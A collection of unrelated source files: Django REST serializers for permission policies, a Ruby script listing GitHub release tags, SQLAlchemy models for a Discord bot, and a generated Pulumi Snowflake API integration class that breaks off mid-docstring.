repeat"]}) return attrs # for validate class HMSEnvConditionSLZ(EnvConditionSLZ): values = serializers.ListField( label="条件的值", child=HMSEnvValueSLZ(label="VALUE"), allow_empty=False, min_length=2, max_length=2 ) def validate(self, attrs): # 比较第一个时间要小于第二个时间, 格式正确的情况下, 直接使用字符串比较是可以 if attrs["values"][0]["value"] >= attrs["values"][1]["value"]: raise serializers.ValidationError({"values": ["first hms must be smaller than the second"]}) return attrs # for validate class TZEnvConditionSLZ(EnvConditionSLZ): values = serializers.ListField( label="条件的值", child=TZEnvValueSLZ(label="VALUE"), allow_empty=False, min_length=1, max_length=1 ) class EnvironmentSLZ(serializers.Serializer): type = serializers.ChoiceField(label="环境属性类型", choices=PolicyEnvTypeEnum.get_choices()) condition = serializers.ListField(label="生效条件", child=EnvConditionSLZ(label="条件")) ENV_COND_TYPE_SLZ_MAP = { PolicyEnvConditionTypeEnum.TZ.value: TZEnvConditionSLZ, PolicyEnvConditionTypeEnum.HMS.value: HMSEnvConditionSLZ, PolicyEnvConditionTypeEnum.WEEKDAY.value: WeekdayEnvConditionSLZ, } # for validate class PeriodDailyEnvironmentSLZ(EnvironmentSLZ): condition = serializers.ListField(label="生效条件", child=EnvConditionSLZ(label="条件"), min_length=2, max_length=3) def validate(self, data): condition_type_set = {c["type"] for c in data["condition"]} # type不能重复 if len(data["condition"]) != len(condition_type_set): raise serializers.ValidationError({"condition": ["type must not repeat"]}) # TZ与HMS必填, WeekDay选填 if not ( PolicyEnvConditionTypeEnum.TZ.value in condition_type_set and PolicyEnvConditionTypeEnum.HMS.value in condition_type_set ): raise serializers.ValidationError({"condition": ["tz and hms must be exists"]}) for c in data["condition"]: if c["type"] not in ENV_COND_TYPE_SLZ_MAP: raise serializers.ValidationError({"condition": ["type: {} not exists".format(c["type"])]}) slz = ENV_COND_TYPE_SLZ_MAP[c["type"]](data=c) slz.is_valid(raise_exception=True) return data ENV_TYPE_SLZ_MAP = {PolicyEnvTypeEnum.PERIOD_DAILY.value: PeriodDailyEnvironmentSLZ} class ResourceGroupSLZ(serializers.Serializer): id = serializers.CharField(label="ID", allow_blank=True) related_resource_types = serializers.ListField(label="资源类型条件", child=ResourceTypeSLZ(label="资源类型")) environments = serializers.ListField( label="环境属性条件", child=EnvironmentSLZ(label="环境属性条件"), allow_empty=True, required=False, default=list ) def validate(self, data): """ 自动填充resource_group_id """ if not isinstance(data["id"], str) or not data["id"]: data["id"] = gen_uuid() # validate environment for e in data["environments"]: if e["type"] not in ENV_TYPE_SLZ_MAP: raise serializers.ValidationError({"environments": ["type: {} not exists".format(e["type"])]}) slz = ENV_TYPE_SLZ_MAP[e["type"]](data=e) slz.is_valid(raise_exception=True) return data class PolicySLZ(serializers.Serializer): type = serializers.CharField(label="操作类型") id = serializers.CharField(label="操作ID") tag = serializers.CharField(label="标签") policy_id = serializers.IntegerField(label="策略ID") name = serializers.CharField(label="操作名称", allow_blank=True) description = serializers.CharField(label="操作描述") expired_at = serializers.IntegerField(label="过期时间", max_value=PERMANENT_SECONDS) expired_display = serializers.CharField() resource_groups = serializers.ListField(label="资源条件组", child=ResourceGroupSLZ(label="资源条件组")) def validate(self, data): # 校验一个policy中不能存在多个不同的时区环境属性 tz_set = set() for rg in data["resource_groups"]: for env in rg["environments"]: if env["type"] != PolicyEnvTypeEnum.PERIOD_DAILY.value: continue for c in env["condition"]: if c["type"] != PolicyEnvConditionTypeEnum.TZ.value: continue tz_set.add(c["values"][0]["value"]) if len(tz_set) > 1: raise serializers.ValidationError( {"resource_groups": {"environments": ["all time zones must be consistent"]}} ) return data class PolicySystemSLZ(serializers.Serializer): id = serializers.CharField(label="系统ID") name = serializers.CharField(label="系统名称") count = serializers.IntegerField(label="权限数量") class PolicyDeleteSLZ(serializers.Serializer): system_id = serializers.CharField(label="系统ID") ids = serializers.CharField(label="策略ID,多个以英文逗号分隔") def validate(self, data): # 验证 ID的合法性,并转化为后续view需要数据格式 ids = data.get("ids") or "" if ids: try: data["ids"] = list(map(int, ids.split(","))) except Exception: # pylint: disable=broad-except raise serializers.ValidationError({"ids": [f"策略IDS({ids})非法,策略ID只能是数字"]}) return data class ConditionDeleteSLZ(serializers.Serializer): id = serializers.CharField(label="条件id") instances = serializers.ListField(label="拓扑选择", child=InstanceSLZ(label="拓扑实例")) class PolicyPartDeleteSLZ(serializers.Serializer): system_id = serializers.CharField(label="资源类型系统ID") resource_group_id = serializers.CharField(label="资源条件组ID") type = serializers.CharField(label="资源类型") ids = serializers.ListField(label="整体删除的条件ID", child=serializers.CharField(label="ConditionID"), allow_empty=True) condition = serializers.ListField(label="部分删除条件", child=ConditionDeleteSLZ(label="条件"), allow_empty=True) def validate(self, data): if not data["ids"] and not data["condition"]: raise serializers.ValidationError({"condition": ["删除条件不能全为空"]}) return data class IDNameSLZ(serializers.Serializer): id = serializers.CharField() name = serializers.CharField() class PolicyExpireSoonSLZ(serializers.Serializer): id = serializers.IntegerField(label="ID") system = IDNameSLZ(label="系统信息") action = IDNameSLZ(label="操作信息") expired_at = serializers.IntegerField(label="过期时间", max_value=PERMANENT_SECONDS) expired_display = serializers.CharField() class BasePolicyActionSLZ(serializers.Serializer): id = serializers.CharField(label="操作ID") type = serializers.CharField(label="操作类型", allow_blank=True) resource_groups = serializers.ListField(label="资源条件组", child=ResourceGroupSLZ(label="资源条件组")) class PolicyActionSLZ(BasePolicyActionSLZ): policy_id = serializers.IntegerField(label="策略id", required=False) expired_at = serializers.IntegerField(label="过期时间", max_value=PERMANENT_SECONDS) class PolicyActionExpiredAtSLZ(BasePolicyActionSLZ): expired_at = serializers.IntegerField(label="过期时间", required=False, default=0, max_value=PERMANENT_SECONDS) class RelatedPolicySLZ(serializers.Serializer): system_id = serializers.CharField(label="系统ID") source_policy = PolicyActionExpiredAtSLZ(label="来源策略") target_policies = serializers.ListField( label="操作策略", child=PolicyActionExpiredAtSLZ(label="策略"), required=False, default=list ) class PolicyResourceCopySLZ(serializers.Serializer): resource_type = ResourceTypeSLZ(label="资源") actions = serializers.ListField(label="目标操作", child=BaseAction(label="操作"), allow_empty=True)
python
#!/usr/bin/env ruby # usage: # ruby all-releases ipython jupyter jupyterlab jupyterhub # dependencies: # gem install netrc octokit activesupport faraday-http-cache # attribution: minrk require "rubygems" require "octokit" require "faraday-http-cache" require "active_support" # enable caching stack = Faraday::RackBuilder.new do |builder| store = ActiveSupport::Cache::FileStore.new "#{Dir.pwd}/cache" builder.use Faraday::HttpCache, serializer: Marshal, store: store, shared_cache: false builder.use Octokit::Response::RaiseError builder.adapter Faraday.default_adapter end Octokit.auto_paginate = true Octokit.middleware = stack github = Octokit::Client.new(:netrc => true) # csv header puts "Date, Org, Repo, Version" ARGV.each do |org_or_repo| if org_or_repo.include? '/' repos = [github.repo(org_or_repo)] else repos = github.repos(org_or_repo) end repos.each do |repo| tags = github.tags(repo.full_name) if not tags.empty? # human ouptut # puts "#{repo.full_name}: #{tags.length} releases" end tags.empty? or tags.each do |tag| v = tag.name # trim prefixes for old releases if v.start_with? 'rel-' v = v.slice(4, v.length) end if v.start_with? 'v' v = v.slice(1, v.length) end # exclude prereleases if v.match(/(b|a|rc|dev)\d*$/) # prerelease next end # exclude non-version tags (e.g. presentations for tutorials) if not v.match(/^\d+(\.\d+)*$/) # not a release next end commit = tag.commit.rels[:self].get.data.commit date = commit.committer.date # human output: # puts " #{v}: #{date.strftime '%Y-%m-%d'}" # csv output: puts "#{date.strftime '%Y-%m-%d'}, #{repo.owner.login}, #{repo.name}, #{v}" end end end
python
from time import sleep import copy import logging import os from disco.bot.command import CommandError from disco.types.base import BitsetMap, BitsetValue from sqlalchemy import ( create_engine as spawn_engine, PrimaryKeyConstraint, Column, exc, ForeignKey, ) from sqlalchemy.dialects.mysql import ( TEXT, BIGINT, INTEGER, VARCHAR, ) from sqlalchemy.engine.url import URL as SQLurl from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import ( scoped_session, sessionmaker, relationship, ) log = logging.getLogger(__name__) Base = declarative_base() class SQLexception(CommandError): def __init__(self, msg, original_exception): self.msg = msg self.original_exception = original_exception class guilds(Base): __tablename__ = "guilds" guild_id = Column( "guild_id", BIGINT(18, unsigned=True), nullable=False, primary_key=True, ) prefix = Column( "prefix", TEXT, nullable=True, ) lyrics_limit = Column( "lyrics_limit", INTEGER, nullable=True, ) alias_list = relationship( "aliases", cascade="all, delete-orphan", backref="guilds", ) def __init__( self, guild_id: int, prefix: str = None, lyrics_limit: int = None): self.guild_id = guild_id self.prefix = prefix self.lyrics_limit = lyrics_limit def __repr__(self): return (f"guilds {self.guild_id}") periods = { 0: "overall", 7: "7day", 1: "1month", 3: "3month", 6: "6month", 12: "12month", } class users(Base): __tablename__ = "users" user_id = Column( "user_id", BIGINT(18, unsigned=True), nullable=False, primary_key=True, ) last_username = Column( "last_username", TEXT, nullable=True, ) period = Column( "period", INTEGER, nullable=True, ) friends = relationship( "friends", cascade="all, delete-orphan", backref="users", ) aliases = relationship( "aliases", cascade="all, delete-orphan", backref="users", ) def __init__( self, user_id: int, last_username: str = None, period: int = None): self.user_id = user_id self.last_username = last_username self.period = period def __repr__(self): return f"users({self.user_id}: {self.last_username})" class friends(Base): __tablename__ = "friends" __table_args__ = ( PrimaryKeyConstraint( "master_id", "slave_id", ), ) master_id = Column( "master_id", BIGINT(18, unsigned=True), ForeignKey(users.user_id, ondelete="CASCADE"), nullable=False, ) slave_id = Column( "slave_id", BIGINT(18, unsigned=True), nullable=False, ) def __init__(self, master_id: int, slave_id: int, index: int = None): self.master_id = master_id self.slave_id = slave_id def __repr__(self): return f"users({self.master_id} : {self.slave_id})" class aliases(Base): __tablename__ = "aliases" __table_args__ = ( PrimaryKeyConstraint( "guild_id", "alias", ), ) user_id = Column( "user_id", BIGINT(18, unsigned=True), ForeignKey(users.user_id, ondelete="CASCADE"), nullable=False, ) guild_id = Column( "guild_id", BIGINT(18, unsigned=True), ForeignKey(guilds.guild_id, ondelete="CASCADE"), nullable=False, ) alias = Column( "alias", VARCHAR(30), nullable=False, ) def __init__(self, user_id, guild_id, alias): self.user_id = user_id self.guild_id = guild_id self.alias = alias def __repr__(self): return f"aliases({self.guild_id}: {self.alias})" class Filter_Status(BitsetValue): class map(BitsetMap): WHITELISTED = 1 << 0 BLACKLISTED = 1 << 1 _all = {"WHITELISTED": WHITELISTED, "BLACKLISTED": BLACKLISTED} def __int__(self): return self.value class filter_types: USER = 0 GUILD = 1 DM = 2 _type_associations = { USER: ("user", ("guilds", "get")), DM: ("channel", ("channels", "get")), GUILD: ("guild", ("guilds", "get")), } @staticmethod def get(state, target, target_type): target_type = getattr(filter_types, target_type.upper(), None) result = filter_types._type_associations.get(target_type, None) if not result: raise CommandError("Invalid type.") key, path = result for attr in path: state = getattr(state, attr) target = state(target) if not target: raise CommandError(f"{key.capitalize()} not found.") return key, target class cfilter(Base): __tablename__ = "filter" __table_args__ = ( PrimaryKeyConstraint( "target", "target_type", ), ) target = Column( "target", BIGINT(18, unsigned=True), nullable=False, ) target_type = Column( "target_type", INTEGER(1, unsigned=True), nullable=False, ) status = Column( "status", INTEGER(1, unsigned=True), nullable=False, ) def __init__(self, status=0, channel=None, guild=None, user=None): data = self._search_kwargs(channel=channel, guild=guild, user=user) self.target = data["target"] self.target_type = data["target_type"] self.status = int(status) @staticmethod def _search_kwargs(channel=None, guild=None, user=None, **kwargs): if not (channel or user or guild): raise TypeError("Missing targeted object.") if channel: if channel.is_dm: target = channel.id target_type = filter_types.DM else: target = channel.guild_id target_type = filter_types.GUILD elif user: target = user.id target_type = filter_types.USER elif guild: target = guild.id target_type = filter_types.GUILD return {"target": target, "target_type": target_type} @classmethod def _get_wrapped(cls, *args, **kwargs): return wrappedfilter(cls(*args, **kwargs)) @staticmethod def _wrap(obj): return wrappedfilter(obj) def __repr__(self): return f"filter_status({self.target})" class wrappedfilter: __slots__ = ("filter", "_status") def __init__(self, cfilter): self.filter = cfilter def __repr__(self): return f"wrapped({self.filter})" @property def status(self): if not hasattr(self, "_status"): if hasattr(self, "filter") and self.filter.status: value = self.filter.status else: value = 0 self._status = Filter_Status(value) return self._status def edit_status(self, value): self.filter.status = int(value) self.status.value = int(value) def blacklist_status(self): return self.status.blacklisted def whitelist_status(self): if self.status.whitelisted: return True return not self.get_count( Filter_Status.map.WHITELISTED, target_type=self.filter.target_type, ) def get_count(self, status, target_type=None, sql_obj=None): return (sql_obj or self.filter).query.filter( filter.status.op("&")(status) == status and (not target_type or filter.target_type == target_type)).count() class sql_instance: __tables__ = ( guilds, users, friends, aliases, cfilter, ) autocommit = True autoflush = True session = None engine = None _driver_ssl_checks = { # starts from self.session.connection() "pymysql": ("connection", "connection", "ssl"), "psycopg2": ("connection", "connection", "info", "ssl_in_use"), } def __init__( self, drivername=None, host=None, port=None, username=None, password=None, database=None, query=None, args=None, local_path=None): self.session, self.engine = self.create_engine_session_safe( drivername, host, port, username, password, database, query, args, local_path, ) self.check_tables() self.spwan_binded_tables() @staticmethod def __call__(function, *args, **kwargs): tries = 0 root_exception = None while True: if tries >= 5: raise SQLexception( "Failed to access data.", root_exception, ) try: return function(*args, **kwargs) except exc.OperationalError as e: sleep(2) tries += 1 root_exception = e def spwan_binded_tables(self): for table in self.__tables__: table_copy = copy.deepcopy(table) table_copy.query = self.session.query_property() setattr(self, table.__tablename__, table_copy) @staticmethod def check_engine_table(table, engine): if not engine.dialect.has_table(engine, table.__tablename__): log.info(f"Creating table {table.__tablename__}") table.__table__.create(engine) def check_tables(self): for table in self.__tables__: self.check_engine_table(table, self.engine) @staticmethod def softget(obj, *args, **kwargs): if hasattr(obj, "_search_kwargs"): search_kwargs = obj._search_kwargs(*args, **kwargs) else: search_kwargs = kwargs data = obj.query.filter_by(**search_kwargs).first() if data: return obj._wrap(data) if hasattr(obj, "_wrap") else data, True obj = (getattr(obj, "_get_wrapped", None) or obj)(*args, **kwargs) return obj, False def add(self, object): self(self.session.add, object) self.flush() def delete(self, object): self(self.session.delete, object) self.flush() def flush(self): self(self.session.flush) def commit(self): self(self.session.commit) self.flush() def ssl_check(self): driver = self.session.connection().engine.driver check_map = self._driver_ssl_checks.get(driver) if not check_map: log.warning(f"Unknown engine {driver}, unable to get ssl status") return position = self.session.connection() for attr in check_map: if not position: break position = getattr(position, attr, None) log.info(f"SQL SSL status: {position or 'unknown'}") return position @staticmethod def create_engine( drivername=None, host=None, port=None, username=None, password=None, database=None, query=None, args=None, local_path=None): # Pre_establish settings if host: settings = SQLurl( drivername, username, password, host, port, database, query, ) args = (args or {}) else: if not os.path.exists("data"): os.makedirs("data") args = {} settings = f"sqlite+pysqlite:///{local_path or 'data/data.db'}" # Connect to server return spawn_engine( settings, encoding="utf8", pool_recycle=3600, pool_pre_ping=True, echo=False, connect_args=args, ) def create_engine_session_safe( self, drivername=None, host=None, port=None, username=None, password=None, database=None, query=None, args=None, local_path=None): engine = self.create_engine( drivername, host, port, username, password, database, query, args, local_path, ) # Verify connection. try: engine.execute("SELECT 1") except exc.OperationalError as e: log.warning("Unable to connect to database, " "defaulting to sqlite: " + str(e)) engine = self.create_engine(local_path=local_path) session = scoped_session( sessionmaker( autocommit=self.autocommit, autoflush=self.autoflush, bind=engine, ), ) return session, engine
python
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from . import _utilities __all__ = ['ApiIntegrationArgs', 'ApiIntegration'] @pulumi.input_type class ApiIntegrationArgs: def __init__(__self__, *, api_allowed_prefixes: pulumi.Input[Sequence[pulumi.Input[str]]], api_provider: pulumi.Input[str], api_aws_role_arn: Optional[pulumi.Input[str]] = None, api_blocked_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, azure_ad_application_id: Optional[pulumi.Input[str]] = None, azure_tenant_id: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None): """ The set of arguments for constructing a ApiIntegration resource. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_allowed_prefixes: Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. :param pulumi.Input[str] api_provider: Specifies the HTTPS proxy service type. :param pulumi.Input[str] api_aws_role_arn: ARN of a cloud platform role. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_blocked_prefixes: Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. :param pulumi.Input[str] azure_ad_application_id: The 'Application (client) id' of the Azure AD app for your remote service. :param pulumi.Input[str] azure_tenant_id: Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. :param pulumi.Input[bool] enabled: Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. :param pulumi.Input[str] name: Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. """ pulumi.set(__self__, "api_allowed_prefixes", api_allowed_prefixes) pulumi.set(__self__, "api_provider", api_provider) if api_aws_role_arn is not None: pulumi.set(__self__, "api_aws_role_arn", api_aws_role_arn) if api_blocked_prefixes is not None: pulumi.set(__self__, "api_blocked_prefixes", api_blocked_prefixes) if azure_ad_application_id is not None: pulumi.set(__self__, "azure_ad_application_id", azure_ad_application_id) if azure_tenant_id is not None: pulumi.set(__self__, "azure_tenant_id", azure_tenant_id) if enabled is not None: pulumi.set(__self__, "enabled", enabled) if name is not None: pulumi.set(__self__, "name", name) @property @pulumi.getter(name="apiAllowedPrefixes") def api_allowed_prefixes(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]: """ Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. """ return pulumi.get(self, "api_allowed_prefixes") @api_allowed_prefixes.setter def api_allowed_prefixes(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]): pulumi.set(self, "api_allowed_prefixes", value) @property @pulumi.getter(name="apiProvider") def api_provider(self) -> pulumi.Input[str]: """ Specifies the HTTPS proxy service type. """ return pulumi.get(self, "api_provider") @api_provider.setter def api_provider(self, value: pulumi.Input[str]): pulumi.set(self, "api_provider", value) @property @pulumi.getter(name="apiAwsRoleArn") def api_aws_role_arn(self) -> Optional[pulumi.Input[str]]: """ ARN of a cloud platform role. """ return pulumi.get(self, "api_aws_role_arn") @api_aws_role_arn.setter def api_aws_role_arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "api_aws_role_arn", value) @property @pulumi.getter(name="apiBlockedPrefixes") def api_blocked_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. """ return pulumi.get(self, "api_blocked_prefixes") @api_blocked_prefixes.setter def api_blocked_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "api_blocked_prefixes", value) @property @pulumi.getter(name="azureAdApplicationId") def azure_ad_application_id(self) -> Optional[pulumi.Input[str]]: """ The 'Application (client) id' of the Azure AD app for your remote service. """ return pulumi.get(self, "azure_ad_application_id") @azure_ad_application_id.setter def azure_ad_application_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_ad_application_id", value) @property @pulumi.getter(name="azureTenantId") def azure_tenant_id(self) -> Optional[pulumi.Input[str]]: """ Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. """ return pulumi.get(self, "azure_tenant_id") @azure_tenant_id.setter def azure_tenant_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_tenant_id", value) @property @pulumi.getter def enabled(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. """ return pulumi.get(self, "enabled") @enabled.setter def enabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "enabled", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @pulumi.input_type class _ApiIntegrationState: def __init__(__self__, *, api_allowed_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_aws_external_id: Optional[pulumi.Input[str]] = None, api_aws_iam_user_arn: Optional[pulumi.Input[str]] = None, api_aws_role_arn: Optional[pulumi.Input[str]] = None, api_blocked_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_provider: Optional[pulumi.Input[str]] = None, azure_ad_application_id: Optional[pulumi.Input[str]] = None, azure_consent_url: Optional[pulumi.Input[str]] = None, azure_multi_tenant_app_name: Optional[pulumi.Input[str]] = None, azure_tenant_id: Optional[pulumi.Input[str]] = None, created_on: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering ApiIntegration resources. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_allowed_prefixes: Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. :param pulumi.Input[str] api_aws_external_id: The external ID that Snowflake will use when assuming the AWS role. :param pulumi.Input[str] api_aws_iam_user_arn: The Snowflake user that will attempt to assume the AWS role. :param pulumi.Input[str] api_aws_role_arn: ARN of a cloud platform role. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_blocked_prefixes: Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. :param pulumi.Input[str] api_provider: Specifies the HTTPS proxy service type. :param pulumi.Input[str] azure_ad_application_id: The 'Application (client) id' of the Azure AD app for your remote service. :param pulumi.Input[str] azure_tenant_id: Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. :param pulumi.Input[str] created_on: Date and time when the API integration was created. :param pulumi.Input[bool] enabled: Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. :param pulumi.Input[str] name: Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. """ if api_allowed_prefixes is not None: pulumi.set(__self__, "api_allowed_prefixes", api_allowed_prefixes) if api_aws_external_id is not None: pulumi.set(__self__, "api_aws_external_id", api_aws_external_id) if api_aws_iam_user_arn is not None: pulumi.set(__self__, "api_aws_iam_user_arn", api_aws_iam_user_arn) if api_aws_role_arn is not None: pulumi.set(__self__, "api_aws_role_arn", api_aws_role_arn) if api_blocked_prefixes is not None: pulumi.set(__self__, "api_blocked_prefixes", api_blocked_prefixes) if api_provider is not None: pulumi.set(__self__, "api_provider", api_provider) if azure_ad_application_id is not None: pulumi.set(__self__, "azure_ad_application_id", azure_ad_application_id) if azure_consent_url is not None: pulumi.set(__self__, "azure_consent_url", azure_consent_url) if azure_multi_tenant_app_name is not None: pulumi.set(__self__, "azure_multi_tenant_app_name", azure_multi_tenant_app_name) if azure_tenant_id is not None: pulumi.set(__self__, "azure_tenant_id", azure_tenant_id) if created_on is not None: pulumi.set(__self__, "created_on", created_on) if enabled is not None: pulumi.set(__self__, "enabled", enabled) if name is not None: pulumi.set(__self__, "name", name) @property @pulumi.getter(name="apiAllowedPrefixes") def api_allowed_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. """ return pulumi.get(self, "api_allowed_prefixes") @api_allowed_prefixes.setter def api_allowed_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "api_allowed_prefixes", value) @property @pulumi.getter(name="apiAwsExternalId") def api_aws_external_id(self) -> Optional[pulumi.Input[str]]: """ The external ID that Snowflake will use when assuming the AWS role. """ return pulumi.get(self, "api_aws_external_id") @api_aws_external_id.setter def api_aws_external_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "api_aws_external_id", value) @property @pulumi.getter(name="apiAwsIamUserArn") def api_aws_iam_user_arn(self) -> Optional[pulumi.Input[str]]: """ The Snowflake user that will attempt to assume the AWS role. """ return pulumi.get(self, "api_aws_iam_user_arn") @api_aws_iam_user_arn.setter def api_aws_iam_user_arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "api_aws_iam_user_arn", value) @property @pulumi.getter(name="apiAwsRoleArn") def api_aws_role_arn(self) -> Optional[pulumi.Input[str]]: """ ARN of a cloud platform role. """ return pulumi.get(self, "api_aws_role_arn") @api_aws_role_arn.setter def api_aws_role_arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "api_aws_role_arn", value) @property @pulumi.getter(name="apiBlockedPrefixes") def api_blocked_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. """ return pulumi.get(self, "api_blocked_prefixes") @api_blocked_prefixes.setter def api_blocked_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "api_blocked_prefixes", value) @property @pulumi.getter(name="apiProvider") def api_provider(self) -> Optional[pulumi.Input[str]]: """ Specifies the HTTPS proxy service type. """ return pulumi.get(self, "api_provider") @api_provider.setter def api_provider(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "api_provider", value) @property @pulumi.getter(name="azureAdApplicationId") def azure_ad_application_id(self) -> Optional[pulumi.Input[str]]: """ The 'Application (client) id' of the Azure AD app for your remote service. """ return pulumi.get(self, "azure_ad_application_id") @azure_ad_application_id.setter def azure_ad_application_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_ad_application_id", value) @property @pulumi.getter(name="azureConsentUrl") def azure_consent_url(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "azure_consent_url") @azure_consent_url.setter def azure_consent_url(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_consent_url", value) @property @pulumi.getter(name="azureMultiTenantAppName") def azure_multi_tenant_app_name(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "azure_multi_tenant_app_name") @azure_multi_tenant_app_name.setter def azure_multi_tenant_app_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_multi_tenant_app_name", value) @property @pulumi.getter(name="azureTenantId") def azure_tenant_id(self) -> Optional[pulumi.Input[str]]: """ Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. """ return pulumi.get(self, "azure_tenant_id") @azure_tenant_id.setter def azure_tenant_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_tenant_id", value) @property @pulumi.getter(name="createdOn") def created_on(self) -> Optional[pulumi.Input[str]]: """ Date and time when the API integration was created. """ return pulumi.get(self, "created_on") @created_on.setter def created_on(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "created_on", value) @property @pulumi.getter def enabled(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. """ return pulumi.get(self, "enabled") @enabled.setter def enabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "enabled", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) class ApiIntegration(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, api_allowed_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_aws_role_arn: Optional[pulumi.Input[str]] = None, api_blocked_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_provider: Optional[pulumi.Input[str]] = None, azure_ad_application_id: Optional[pulumi.Input[str]] = None, azure_tenant_id: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None, __props__=None): """ ## Example Usage ```python import pulumi import pulumi_snowflake as snowflake api_integration = snowflake.ApiIntegration("apiIntegration", api_allowed_prefixes=["https://123456.execute-api.us-west-2.amazonaws.com/prod/"], api_aws_role_arn="arn:aws:iam::000000000001:/role/test", api_provider="aws_api_gateway", enabled=True) ``` ## Import ```sh $ pulumi import snowflake:index/apiIntegration:ApiIntegration example name ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_allowed_prefixes: Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. :param pulumi.Input[str] api_aws_role_arn: ARN of a cloud platform role. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_blocked_prefixes: Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. :param pulumi.Input[str] api_provider: Specifies the HTTPS proxy service type. :param pulumi.Input[str] azure_ad_application_id: The 'Application (client) id' of the Azure AD app for your remote service. :param pulumi.Input[str] azure_tenant_id: Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. :param pulumi.Input[bool] enabled: Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. :param pulumi.Input[str] name: Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. """ ... @overload def __init__(__self__, resource_name: str, args: ApiIntegrationArgs, opts: Optional[pulumi.ResourceOptions] = None): """ ## Example Usage ```python import pulumi import pulumi_snowflake as snowflake api_integration = snowflake.ApiIntegration("apiIntegration", api_allowed_prefixes=["https://123456.execute-api.us-west-2.amazonaws.com/prod/"], api_aws_role_arn="arn:aws:iam::000000000001:/role/test", api_provider="aws_api_gateway", 